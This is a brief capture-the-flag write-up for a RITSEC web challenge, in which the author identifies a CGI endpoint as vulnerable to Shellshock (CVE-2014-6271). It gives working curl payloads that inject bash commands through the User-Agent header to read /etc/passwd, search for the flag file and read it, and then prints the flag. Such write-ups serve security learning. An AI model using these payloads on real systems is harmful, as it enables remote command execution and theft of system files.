Challenge description
This dog is shockingly cute!
fun.ritsec.club:8008
Author: sandw1ch
Ok. let’ check the url and view the source code
/cgi-bin/stats. Ok. i try to search google “/cgi-bin/stats”
It CVE 2014-6271. Time to exploit.
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd;'" http://fun.ritsec.club:8008/cgi-bin/stats
Find the flag with command.
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'find / -name flag.txt;'" http://fun.ritsec.club:8008/cgi-bin/stats
And than read flag.
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /opt/flag.txt;'" http://fun.ritsec.club:8008/cgi-bin/stats
Flag is
RITSEC{sh3ll_sh0cked_w0wz3rs}
Thanks for reading..